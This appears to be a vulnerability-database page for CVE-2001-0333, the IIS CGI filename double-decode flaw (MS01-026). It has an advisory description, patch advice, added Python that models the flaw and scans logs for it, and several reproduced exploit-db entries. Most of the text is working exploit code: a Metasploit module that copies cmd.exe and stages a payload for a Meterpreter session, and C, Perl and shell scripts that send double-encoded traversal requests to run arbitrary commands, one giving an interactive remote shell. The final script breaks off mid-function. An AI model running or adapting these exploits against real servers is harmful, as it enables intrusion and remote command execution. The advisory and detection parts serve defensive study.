CVE-2001-0333
CVSS 7.5
Published: 2001-06-27 00:00:00
Revised: 2016-10-17 22:10:40

[Original] Directory traversal vulnerability in IIS 5.0 and earlier allows remote attackers to execute arbitrary commands by encoding .. (dot dot) and "\" characters twice.


[CNNVD] Microsoft IIS CGI Filename Decoding Error Vulnerability (MS01-026) (CNNVD-200106-190)

        
IIS is a widely deployed Internet web server from Microsoft, bundled with Windows NT and Windows 2000. By default, certain IIS directories allow executable files to be run by submitting an HTTP request.
The NSFOCUS security team discovered a vulnerability in how Microsoft IIS 4.0/5.0 handles CGI program filenames: because the filename is erroneously decoded twice, a remote attacker may exploit it to execute arbitrary system commands on the host with the privileges of the web process.
When IIS loads an executable CGI program, it performs two decoding passes. The first pass HTTP-decodes the CGI filename and then determines whether it names an executable, for example by checking whether the extension is ".exe" or ".com". After the filename check passes, IIS performs a second decoding pass. Normally only the CGI parameters should be decoded at this point; however, IIS erroneously decodes the already-decoded CGI filename together with the CGI parameters. As a result, the CGI filename is decoded twice.
By carefully constructing the CGI filename, an attacker can bypass the security checks IIS applies to it, such as the checks for "../" or "./", and under certain conditions execute arbitrary system commands.
For example, the character '\' is normally encoded as %5c. The three characters of that encoding are themselves encoded as:
'%' = %25
'5' = %35
'c' = %63
Encoding these three characters a second time can therefore take several forms, for example:
%255c
%%35c
%%35%63
%25%35%63
...
Thus "..\" can be written as "..%255c", "..%%35c", and so on.
After the first decoding pass this becomes "..%5c", which IIS treats as an ordinary string that does not violate its security checks. After the second decoding pass it becomes "..\". An attacker can therefore use "..\" to traverse directories and execute arbitrary programs outside the web directory.
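The two decoding passes described above, as an added worked example (this is not code from the CNNVD record, from NSFOCUS or from Microsoft): a single-pass percent decoder that keeps a stray '%' literal, a model of the vulnerable order of operations (decode, check, decode again), and the canonicalise-then-check order that removes the flaw. All function names are this example's own.

```python
"""Model of the IIS CGI filename double-decode flaw (CVE-2001-0333).

Added example; not code from the CNNVD record, NSFOCUS or Microsoft.
It reproduces the two decode passes the description lays out and
contrasts the vulnerable order of operations (decode, check, decode again)
with canonicalise-then-check. All function names are this example's own.
"""
import string

HEXDIGITS = set(string.hexdigits)


def percent_decode_once(s: str) -> str:
    """One pass of percent-decoding. A '%' that is not followed by two hex
    digits is kept as a literal, which is why '%%35c' -> '%5c' in one pass."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "%" and i + 2 < len(s) and s[i + 1] in HEXDIGITS and s[i + 2] in HEXDIGITS:
            out.append(chr(int(s[i + 1:i + 3], 16)))
            i += 3
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def decode_to_fixpoint(s: str, limit: int = 8):
    """Decode repeatedly until the string stops changing.
    Returns (canonical string, number of passes that changed it)."""
    passes = 0
    while passes < limit:
        nxt = percent_decode_once(s)
        if nxt == s:
            break
        s, passes = nxt, passes + 1
    return s, passes


def has_traversal(path: str) -> bool:
    """True if any path segment is '..'; IIS treats '/' and '\\' alike."""
    return ".." in path.replace("\\", "/").split("/")


def flawed_iis_filter(raw_uri: str):
    """The vulnerable order: decode once, run the security check, then decode
    again together with the CGI parameters. Returns (check_passed, path_used)."""
    first = percent_decode_once(raw_uri)
    if has_traversal(first):
        return False, first
    # The second pass was meant for the parameters only, but it also hits
    # the already-decoded filename: '..%5c' becomes '..\\' after the check.
    return True, percent_decode_once(first)


def hardened_filter(raw_uri: str) -> bool:
    """Canonicalise fully, then check. A URI that needs more than one pass to
    reach its fixpoint is rejected outright: a legitimate client sends one
    layer of encoding, so a second layer is itself a red flag."""
    path, passes = decode_to_fixpoint(raw_uri)
    if passes > 1:
        return False
    return not has_traversal(path)


if __name__ == "__main__":
    # The four encodings of '\\' listed in the description, each prefixed with '..'.
    for enc in ("..%255c", "..%%35c", "..%%35%63", "..%25%35%63"):
        once = percent_decode_once(enc)
        print(f"{enc:14} -> {once:8} -> {percent_decode_once(once)!r}")
    probe = "/scripts/..%255c..%255cwinnt/system32/cmd.exe"   # URI from the record above
    print("flawed  :", flawed_iis_filter(probe))   # (True, '/scripts/..\\..\\winnt/system32/cmd.exe')
    print("hardened:", hardened_filter(probe))     # False
```

The essential fix is the order of operations: validate only after every decoding layer has been applied. Rejecting anything that needs a second pass is a stricter, defence-in-depth choice; it will also reject a legitimately single-encoded name that happens to contain a '%' followed by two hex digits, so a deployment that must serve such names should keep only the canonicalise-then-check part.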
        

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:microsoft:internet_information_server:5.0
cpe:/a:microsoft:internet_information_server:4.0  Microsoft IIS 4.0

- OVAL (technical details for detection)

oval:org.mitre.oval:def:78  Windows 2000 IIS Directory Traversal Command Execution (Test 1)
oval:org.mitre.oval:def:37  Windows NT IIS Directory Traversal Command Execution (Test 1)
oval:org.mitre.oval:def:1051  Windows 2000 IIS Directory Traversal Command Execution (Test 2)
oval:org.mitre.oval:def:1018  Windows NT IIS Directory Traversal Command Execution (Test 2)
*OVAL describes in detail how to detect this vulnerability; the OVAL definitions listed above contain further technical details of the detection.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0333
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0333
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200106-190
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=98992056521300&w=2
(UNKNOWN)  BUGTRAQ  20010515 NSFOCUS SA2001-02 : Microsoft IIS CGI Filename Decode Error Vulnerability
http://www.cert.org/advisories/CA-2001-12.html
(UNKNOWN)  CERT  CA-2001-12
http://www.microsoft.com/technet/security/bulletin/MS01-026.asp
(VENDOR_ADVISORY)  MS  MS01-026
http://www.securityfocus.com/bid/2708
(UNKNOWN)  BID  2708
http://xforce.iss.net/static/6534.php
(UNKNOWN)  XF  iis-url-decoding(6534)

- Vulnerability information

Microsoft IIS CGI Filename Decoding Error Vulnerability (MS01-026)
High risk  Design error
2001-06-27 00:00:00 2005-10-12 00:00:00
Remote
        
        

- Advisories and patches

Workaround:
If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* If executable CGI is not needed, remove the executable virtual directories, for example /scripts.
* If an executable virtual directory is genuinely needed, place it on a separate partition, move every command-line tool an attacker could leverage to another directory, and deny the GUEST group access to it.
Vendor patch:
Microsoft
---------
Microsoft has released a security bulletin (MS01-026) and the corresponding patch:
MS01-026: 14 May 2001 Cumulative Patch for IIS
Link:
http://www.microsoft.com/technet/security/bulletin/MS01-026.asp

Patch download:
Microsoft IIS 4.0:

http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787

Microsoft IIS 5.0:

http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764

- Vulnerability information (16467)

Microsoft IIS/PWS CGI Filename Double Decode Command Execution (EDBID:16467)
windows remote
2011-01-08 Verified
0 metasploit
##
# $Id: ms01_026_dbldecode.rb 11513 2011-01-08 00:25:44Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex/proto/tftp'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	# NOTE: This cannot be an HttpClient module since the response from the server
	# is not a valid HttpResponse
	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::CmdStagerTFTP

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft IIS/PWS CGI Filename Double Decode Command Execution',
			'Description'    => %q{
					This module will execute an arbitrary payload on a Microsoft IIS installation
				that is vulnerable to the CGI double-decode vulnerability of 2001.

				NOTE: This module will leave a metasploit payload in the IIS scripts directory.
			},
			'Author'         => [ 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11513 $',
			'References'     =>
				[
					[ 'CVE', '2001-0333' ],
					[ 'OSVDB', '556' ],
					[ 'BID', '2708' ],
					[ 'MSB', 'MS01-026' ],
					[ 'URL', 'http://marc.info/?l=bugtraq&m=98992056521300&w=2' ]
				],
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', { } ]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'May 15 2001'
		))

		register_options(
			[
				Opt::RPORT(80),
				OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]),
				OptString.new('CMD', [ false, 'Execute this command instead of using command stager', nil ])
			], self.class)

		framework.events.add_exploit_subscriber(self)
	end


	def dotdotslash
		possibilities = [
			"..%255c",
			"..%%35c",
			"..%%35%63",
			"..%25%35%63",
			".%252e/",
			"%252e./",
			"%%32%65./",
			".%%32%65/",
			".%25%32%65/",
			"%25%32%65./"
		]
		possibilities[rand(possibilities.length)]
	end


	def mini_http_request(opts, timeout=5)
		connect
		req = ''
		req << opts['method']
		req << ' '
		req << opts['uri']
		req << ' '
		req << "HTTP/1.0\r\n"
		req << "Host: #{datastore['RHOST']}\r\n"
		req << "\r\n"
		sock.put(req)

		# This isn't exactly awesome, but it seems to work..
		begin
			headers = sock.get_once(-1, timeout)
			body = sock.get_once(-1, timeout)
		rescue ::EOFError
			# nothing
		end

		if (datastore['DEBUG'])
			print_status("Headers:\n" + headers.inspect)
			print_status("Body:\n" + body.inspect)
		end
		disconnect
		[headers, body]
	end


	def check
		res = execute_command("dir")
		if (res.kind_of?(Array))
			body = res[1]
			if (body and body =~ /Directory of /)
				return Exploit::CheckCode::Vulnerable
			end
		end

		Exploit::CheckCode::Safe
	end


	#
	# NOTE: the command executes regardless of whether or not
	# a valid response is returned...
	#
	def execute_command(cmd, opts = {})

		# Don't try the start command...
		# Using the "start" method doesn't seem to make iis very happy :(
		return [nil,nil] if cmd =~ /^start [a-zA-Z]+\.exe$/

		print_status("Executing command: #{cmd}")

		uri = '/scripts/'
		exe = opts[:cgifname]
		if (not exe)
			uri << dotdotslash
			uri << dotdotslash
			uri << 'winnt/system32/cmd.exe'
		else
			uri << exe
		end
		uri << '?/x+/c+'
		uri << Rex::Text.uri_encode(cmd)

		if (datastore['VERBOSE'])
			print_status("Attemping to execute: #{uri}")
		end

		mini_http_request({
				'uri'     => uri,
				'method'  => 'GET',
			}, 20)
	end


	def exploit

		# first copy the file
		exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
		print_status("Copying cmd.exe to the web root as \"#{exe_fname}\"...")
		# NOTE: this assumes %SystemRoot% on the same drive as the web scripts directory
		# However, it using %SystemRoot% doesn't seem to work :(
		res = execute_command("copy \\winnt\\system32\\cmd.exe #{exe_fname}")

		if (datastore['CMD'])
			res = execute_command(datastore['CMD'], { :cgifname => exe_fname })
			if (res[0])
				print_status("Command output:\n" + res[0])
			else
				print_error("No output received")
			end

			res = execute_command("del #{exe_fname}")
			return
		end

		# Use the CMD stager to get a payload running
		execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname })

		# Save these file names for later deletion
		@exe_cmd_copy = exe_fname
		@exe_payload = payload_exe

		# Just for good measure, we'll make a quick, direct request for the payload
		# Using the "start" method doesn't seem to make iis very happy :(
		print_status("Triggering the payload via a direct request...")
		mini_http_request({ 'uri' => '/scripts/' + payload_exe, 'method' => 'GET' }, 1)

		handler

	end

	#
	# The following handles deleting the copied cmd.exe and payload exe!
	#
	def on_new_session(client)

		if client.type != "meterpreter"
			print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.")
			print_error("The copied exe and the payload exe must be removed manually.")
			return
		end

		return if not @exe_cmd_copy

		# stdapi must be loaded before we can use fs.file
		client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")

		# Delete the copied CMD.exe
		print_status("Deleting copy of CMD.exe \"#{@exe_cmd_copy}\" ...")
		client.fs.file.rm(@exe_cmd_copy)

		# Migrate so  that we can delete the payload exe
		client.console.run_single("run migrate -f")

		# Delete the payload exe
		return if not @exe_payload

		delete_me_too = "C:\\inetpub\\scripts\\" + @exe_payload

		print_status("Changing permissions on #{delete_me_too} ...")
		cmd = "C:\\winnt\\system32\\attrib.exe -r -h -s " + delete_me_too
		client.sys.process.execute(cmd, nil, {'Hidden' => true })

		print_status("Deleting #{delete_me_too} ...")
		begin
			client.fs.file.rm(delete_me_too)
		rescue ::Exception => e
			print_error("Exception: #{e.inspect}")
		end
	end

	def cleanup
		framework.events.remove_exploit_subscriber(self)
	end

end
		

- Vulnerability information (20835)

MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (1) (EDBID:20835)
windows remote
2001-05-15 Verified
0 Filip Maertens
source: http://www.securityfocus.com/bid/2708/info

Due to a flaw in the handling of CGI filename program requests, remote users can execute arbitrary commands on an IIS host.

When IIS receives a CGI filename request, it automatically performs two actions before completing the request:

1. IIS decodes the filename to determine the filetype and the legitimacy of the file. IIS then carries out a security check.

2. When the security check is completed, IIS decodes CGI parameters.

A flaw in IIS involves a third undocumented action: Typically, IIS decodes only the CGI parameter at this point, yet the previously decoded CGI filename is mistakenly decoded twice. If a malformed filename is submitted and circumvents the initial security check, the undocumented procedure will decode the malformed request, possibly allowing the execution of arbitrary commands.

Note that arbitrary commands will be run with the IUSR_machinename account privileges. Reportedly, various encoding combinations under Windows 2000 Server and Professional may yield different outcomes.

Personal Web Server 1.0 and 3.0 are reported vulnerable to this issue.

The worm Nimda (and variants) actively exploits this vulnerability.
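Because the request pattern above was sprayed across the Internet by Nimda, it is also one of the easiest things to find in web server logs after the fact. The following is an added example, not part of the exploit-db entry or of any vendor tool: a small scanner for IIS W3C extended log files that decodes each cs-uri-stem until it stops changing, counts how many passes that took, and flags traversal segments and cmd.exe. It assumes the default W3C format with a "#Fields:" header and that cs-uri-stem is logged as the client sent it (still percent-encoded); the five log lines are constructed for this example and use documentation address ranges.

```python
"""Scan IIS W3C extended log lines for double-encoded traversal requests
of the kind CVE-2001-0333 / Nimda used.

Added example; not part of the exploit-db entry or of any vendor tool.
Assumptions: W3C extended format with a '#Fields:' header, and cs-uri-stem
recorded as received (percent-encoded). SAMPLE_LOG is constructed.
"""
from urllib.parse import unquote

# Constructed sample log (documentation address ranges), not a real capture.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-18 10:00:01 192.0.2.10 GET /default.htm - 200
2001-09-18 10:00:02 198.51.100.7 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir 200
2001-09-18 10:00:03 198.51.100.7 GET /msadc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe /c+tftp 502
2001-09-18 10:00:04 192.0.2.11 GET /images/100%2525.gif - 404
2001-09-18 10:00:05 192.0.2.12 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+dir 404
"""


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def decode_depth(s, limit=8):
    """Decode with urllib until the string stops changing; returns (decoded, passes).
    unquote keeps a '%' that is not followed by two hex digits, so
    '%%35c' -> '%5c' -> '\\' takes two passes, like the server's two decodes."""
    passes = 0
    while passes < limit:
        nxt = unquote(s)
        if nxt == s:
            break
        s, passes = nxt, passes + 1
    return s, passes


def classify(record):
    """Return the list of indicator names for one record (empty if clean)."""
    stem, passes = decode_depth(record["cs-uri-stem"])
    segments = stem.replace("\\", "/").lower().split("/")
    reasons = []
    if ".." in segments:
        reasons.append("traversal")        # escapes the virtual directory
    if passes >= 2:
        reasons.append("double-encoded")   # a second encoding layer was present
    if segments[-1] == "cmd.exe":
        reasons.append("cmd.exe")          # the command interpreter itself
    return reasons


def scan(text):
    """Return [(c-ip, cs-uri-stem, reasons)] for every record with an indicator."""
    hits = []
    for record in parse_w3c(text):
        reasons = classify(record)
        if reasons:
            hits.append((record["c-ip"], record["cs-uri-stem"], reasons))
    return hits


if __name__ == "__main__":
    for ip, stem, reasons in scan(SAMPLE_LOG):
        print(ip, stem, ",".join(reasons))
```

The single-encoded attempt in the last sample line is blocked by the server's own check (sc-status 404) but is still reported, since the same client often follows it with the double-encoded form; the "100%2525.gif" line shows that double encoding on its own is only a weak signal and is worth alerting on mainly in combination with the other two indicators.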

/*
 *
 * execiis.c - (c)copyright Filip Maertens
 * BUGTRAQ ID: 2708 - Microsoft IIS CGI Filename Decode Error
 *
 * DISCLAIMER:    This  is  proof of concept code.  This means, this code
 * may only be used on approved systems in order to test the availability
 * and integrity of machines  during a legal penetration test.  In no way
 * is the  author of  this exploit  responsible for the use and result of
 * this code.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr() */
#include <unistd.h>
#include <string.h>


/* Modify this value to whichever sequence you want.
 *
 * %255c = %%35c = %%35%63 = %25%35%63 = /
 *
 */

#define SHOWSEQUENCE "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+"



int main(int argc, char *argv[])
{

 struct sockaddr_in sin;
 char recvbuffer[1], stuff[200] = "";   /* request buffer; must start empty for strcat() */
 int create_socket;

 printf("iisexec.c | Microsoft IIS CGI Filename Decode Error | <filip@securax.be>\n-------------------------------------------------------------------------\n");

 if (argc < 3)
 {
  printf(" -- Usage: iisexec [ip] [command]\n");
  exit(0);
 }


 if (( create_socket = socket(AF_INET,SOCK_STREAM,0)) > 0 )
  printf(" -- Socket created.\n");

 sin.sin_family = AF_INET;
 sin.sin_port = htons(80);
 sin.sin_addr.s_addr = inet_addr(argv[1]);

 if (connect(create_socket, (struct sockaddr *)&sin,sizeof(sin))==0)
  printf(" -- Connection made.\n");
 else
  { printf(" -- No connection.\n"); exit(1); }


 strcat(stuff, "GET ");
 strcat(stuff, SHOWSEQUENCE);
 strcat(stuff, argv[2]);
 strcat(stuff, " HTTP/1.0\n\n");

 memset(recvbuffer, '\0',sizeof(recvbuffer));

 send(create_socket, stuff, sizeof(stuff), 0);
 recv(create_socket, recvbuffer, sizeof (recvbuffer),0);



 if ( strstr(recvbuffer,"404") == NULL )
 {
     printf(" -- Command output:\n\n");
     while(recv(create_socket, recvbuffer, 1, 0) > 0)
     {
      printf("%c", recvbuffer[0]);
     }
 }
 else
  printf(" -- Wrong command processing. \n");

 close(create_socket);
 return 0;
}
		

- Vulnerability information (20836)

MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (2) (EDBID:20836)
windows remote
2001-05-16 Verified
0 HuXfLuX
source: http://www.securityfocus.com/bid/2708/info
 
 
/*  IISEX by HuXfLuX <huxflux2001@hotmail.com>. IIS CGI File Decode Bug exploit. Written 16-05-2001.
    Compiles on Linux, works with IIS versions 3, 4 and 5. Microsoft's products were always
    famous for their backward compatibility!

    You can change the SHOWSEQUENCE value to some other strings that also work.
    More info: http://www.nsfocus.com

    Thanx to Filip Maertens <filip@securax.be>
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>   /* bzero() */
#include <stdarg.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>

#define SHOWSEQUENCE "/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+"

int resolv(char *hostname,struct in_addr *addr);

int main(int argc, char *argv[])
{

        struct sockaddr_in sin;
        struct in_addr victim;
        char recvbuffer[1], stuff[200]="";
        int create_socket;

        printf("IISEX by HuxFlux <huxflux2001@hotmail.com>\nThis exploits the IIS CGI Filename Decode Error.\nWorks with IIS versions 3, 4 and 5!.\n");

        if (argc < 3)
        {
                printf("[?] Usage: %s [ip] [command]\n", argv[0]);
                exit(0);
        }

        if (!resolv(argv[1],&victim))
        {
                printf("[x] Error resolving host.\n");
                exit(-1);
        }
        printf("\n[S] Exploit procedure beginning.\n");

        if (( create_socket = socket(AF_INET,SOCK_STREAM,0)) > 0 )
                printf("[*] Socket created.\n");

        bzero(&sin,sizeof(sin));
        memcpy(&sin.sin_addr,&victim,sizeof(struct in_addr));
        sin.sin_family = AF_INET;
        sin.sin_port = htons(80);
        //sin.sin_addr.s_addr = inet_addr(argv[1]);


        if (connect(create_socket, (struct sockaddr *)&sin,sizeof(sin))==0)
                printf("[*] Connection made.\n");
        else {
                printf("[x] No connection.\n");
                exit(1);
        }

        strcat(stuff, "GET ");
        strcat(stuff, SHOWSEQUENCE);
        strcat(stuff, argv[2]);
        strcat(stuff, " HTTP/1.0\r\n\r\n");
        printf("[*] Sending: %s", stuff);

        memset(recvbuffer, '\0',sizeof(recvbuffer));

        send(create_socket, stuff, sizeof(stuff), 0);

        if ( strstr(recvbuffer,"404") == NULL ) {
                printf("[*] Command output:\n\n");

                while(recv(create_socket, recvbuffer, 1, 0) > 0)
                {
                        printf("%c", recvbuffer[0]);
                }
                printf("\n\n");
        }
        else printf("[x] Wrong command processing. \n");
        printf("[E] Finished.\n");

        close(create_socket);
        return 0;
}

/* Accept either a dotted-quad address or a host name. */
int resolv(char *hostname,struct in_addr *addr)
{
        struct hostent *res;

        if (inet_aton(hostname,addr)) return(1);

        res = gethostbyname(hostname);
        if (res == NULL) return(0);

        memcpy((char *)addr,(char *)res->h_addr,sizeof(struct in_addr));
        return(1);
}
		

- Vulnerability information (20837)

MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (3) (EDBID:20837)
windows remote
2001-05-15 Verified
0 Cyrus The Gerat
source: http://www.securityfocus.com/bid/2708/info
  

#!/usr/bin/perl
# Written by Cyrus The Gerat , CyrusArmy@Bigfoot.com , May 15th 2001
# This perl script lets you to test the vulnerable servers to IIS4/5 CGI decode hole,
# Also you can exploit the hole and execute your commands remotely!
# Vulnerability found by NSfocus security team,
# Tested for compatibility on UNIX/WINDOWS (activestate perl)
# Works well on windows and unix platforms,


$ARGC=@ARGV;
if ($ARGC <3) {
 print "\n\nRemote IIS4/5 decode hole tester! By CyrusTheGreat ,CyrusArmy\@Bigfoot.com\n";
 print "\n Usage:\n\n $0 <victim host> <victim port> <command line to execute>\n\n";
 print "        Victim Host: Address of IIS4/5 server vulnerable to decode hole! \n";
 print "        Victim port: HTTP/HTTPS port 80 or 443\n";
 print "        Command to Execute: for example \"echo Just hacked! > hacked.txt\"  \n\n";
 exit;
}
use Socket;

my ($host,$port,$target,$notvulnerable,$notfound,$notcopied,$accessdenied);
$host=$ARGV[0];
$port=$ARGV[1];
$target=inet_aton($host);
$notvulnerable=1;
$notfound=1;
$accessdenied=0;

print "\nRemote IIS4/5 decode hole tester! By CyrusTheGreat ,CyrusArmy\@Bigfoot.com\n";
print "Connecting to server $host port $port..., \n\n";
@results=sendraw("GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver HTTP/1.0\r\n\r\n");

for ($i=0; $i <=7 ;$i++ ) {
print $results[$i];
}


foreach $line (@results){
 if ($line =~ /\[Version/) {
 $notvulnerable=0;
 print "\nWow! system is vulnerable.\n";
 print $line;
 }
 }

if ($notvulnerable) {
 print "\nOops! System is not vulnerable. \n";
 exit(1);
}

# you can exchange Wow! and Oops! as you prefer! ;-)

print "\nChecking for command interpreter...\n";
@results=sendraw("GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir%20cyrus%2eexe HTTP/1.0\r\n\r\n");
#print @results;

foreach $line (@results){
 if ($line =~ /cyrus.exe/) {$notfound=0;}
}

if ($notfound) {
 print "Command interpreter not found, Trying to copy cmd.exe \n";
 @results=sendraw("GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd%2eexe+cyrus%2eexe HTTP/1.0\r\n\r\n");
#print @results;
 }

 foreach $line (@results){
  if (($line =~ /denied/ )) {$accessdenied=1;}
 }

 if ($accessdenied) {
 print"Cannot copy command interpreter, Try manually! \n\n";
 exit(2);
 } else {
   print "Command interpreter OK \n";
  }

$command=$ARGV[2];
print "Now executing your command: $command \n\n";
#$command=~s/ /\%20/g;
$command =~ s/(\W)/sprintf("%%%x", ord($1))/eg;
#print $command;
my @results=sendraw("GET /scripts/cyrus.exe?/c+$command HTTP/1.0\r\n\r\n");
print @results;

    print STDOUT "\n\nMore commands? , or EOF to end:\n";
    while ($command = <STDIN>) {
            print "You said: $command \n";
	    chop $command;
		$command =~ s/(\W)/sprintf("%%%x", ord($1))/eg;
		my @results=sendraw("GET /scripts/cyrus.exe?/c+$command HTTP/1.0\r\n\r\n");
		print @results;
            print "\n\nTell me more, or EOF (^D/^Z) to end:\n";
    }
    print "\nThat's all! Another IIS hole just similified by cyrus!\n";

# Send one raw HTTP request and return every response line.
sub sendraw {
        my ($pstr)=@_;

        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,$port,$target)){
                my @in;
                select(S);      $|=1;   print $pstr;
                while(<S>){ push @in, $_;}
                select(STDOUT); close(S); return @in;
        } else {
		 print "Cannot connect to $host port $port\n";
		 exit(3); }
}

		

- Vulnerability information (20838)

MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (4) (EDBID:20838)
windows remote
2001-05-15 Verified
0 MovAX
source: http://www.securityfocus.com/bid/2708/info
   

/*  lalaiis.c
    (or Microsoft IIS/PWS Escaped Characters Decoding Command Execution
        Vulnerability)

   Bugtraq id: 2708

   It gives you a "shell-like" environment to test your IIS servers
   Coded by MovAX <movax@softhome.et>
   Greetz to: lala, HeH! Magazine staff <http://www.dtmf.com.ar/digitalrebel>
   Fuckz to: Feel free to add your handle to this section.

*/


#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>   /* alarm(), close() */
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <signal.h>
#include <errno.h>
#include <fcntl.h>

void usage(void)
{
 fprintf(stderr, "\nusage: ./lalaiis <website> <vulnerable_directory>");
 fprintf(stderr, "\nwhere vulnerable_directory can be any 'scriptable' dir (like scripts msadc)");
 fprintf(stderr, "\nex: ./lalaiis www.foo.bar scripts\n");
 exit(-1);
}

int main(int argc, char **argv)
{
 int i, le_socket, le_connect_error;
 int timeout=80;            /* seconds allowed for connect() and for each recv() */
 int le_timeout=timeout;
 int port=80;
 char temp[1];
 char host[512]="";
 char command[1024]="";
 char request[8192]="GET /";
 struct hostent *he;
 struct sockaddr_in s_addr;

 printf(":: lalaiis.c exploit. Coded by MovAX\n");

 if (argc < 3)
    usage();

 strncpy(host, argv[1], sizeof(host) - 1);

 if(!strcmp(host, ""))
 {
  fprintf(stderr, "put a damn server\n");
  usage();
 }

 printf("\n:: Destination host > %s:%d\n", host, port);


 if((he=gethostbyname(host)) == NULL)
 {
  fprintf(stderr, "put a damn VALID server\n");
  usage();
 }

 for (;;)
 {
  command[0]=0;
  printf("\nlala_shell> ");
  if(fgets(command, sizeof(command), stdin) == NULL)   /* EOF ends the session */
   break;
  command[strcspn(command, "\n")]='\0';
  if(!strcmp("logout", command))
   exit(-1);

  /* spaces are sent as '+' in the query string */
  for(i=0;i<strlen(command);i++)
  {
   if(command[i]==' ')
    command[i]='+';
  }

  /* one request per command; the traversal sequence is appended to the chosen directory */
  strncpy(request, "GET /", sizeof(request));
  strncat(request, argv[2], sizeof(request) - strlen(request) - 1);
  strncat(request, "/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+", sizeof(request) - strlen(request) - 1);
  strncat(request, command, sizeof(request) - strlen(request) - 1);
  strncat(request, " HTTP/1.1\n", sizeof(request) - strlen(request) - 1);
  strncat(request, "host:" ,sizeof(request) - strlen(request) - 1);
  strncat(request, argv[1], sizeof(request) - strlen(request) - 1);
  strncat(request, "\n\n", sizeof(request) - strlen(request) - 1);

  s_addr.sin_family = AF_INET;
  s_addr.sin_port = htons(port);
  memcpy((char *) &s_addr.sin_addr, (char *) he->h_addr, sizeof(s_addr.sin_addr));

  if((le_socket=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
  {
   perror("socket\n");
   exit(-1);
  }
  alarm(le_timeout);
  le_connect_error = connect(le_socket,(struct sockaddr *)&s_addr,sizeof(s_addr));
  alarm(0);

  if(le_connect_error==-1)
  {
   perror("connect");
   close(le_socket);
   exit(-1);
  }

  send(le_socket, request, strlen(request), 0);
  while(recv(le_socket,temp,1, 0)>0)
  {
   alarm(timeout);
   printf("%c", temp[0]);
   alarm(0);
  }
  close(le_socket);   /* a fresh connection is opened for the next command */
 }
 return 0;
}
		

- Vulnerability information (20839)

MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (5) (EDBID:20839)
windows remote
2001-05-15 Verified
0 Leif Jakob
source: http://www.securityfocus.com/bid/2708/info
    

#!/bin/sh

# Copyright 2001 by Leif Jakob <bugtraq@jakob.weite-welt.com>
#
# do not abuse this code... blah blah :)

if [ -z "$1" ] ; then
    echo "usage:"
    echo "$0 hostname"
    exit 1
fi

host="$1"

NETCAT=`which netcat`

if [ -z "$NETCAT" ] ; then
    NETCAT=`which nc`
fi

if [ -z "$NETCAT" -o ! -x "$NETCAT" ] ; then
    echo "you need netcat to make this work"
    exit 1
fi

echo "using netcat:$NETCAT"

# Write the raw request to stdout; netcat reads it from stdin.
makeRequest()
{
    host="$1"
    count=$2
    cmd="$3"
    printf 'GET /scripts/'
    while [ $count -gt 0 ] ; do
	printf '..%%255c'
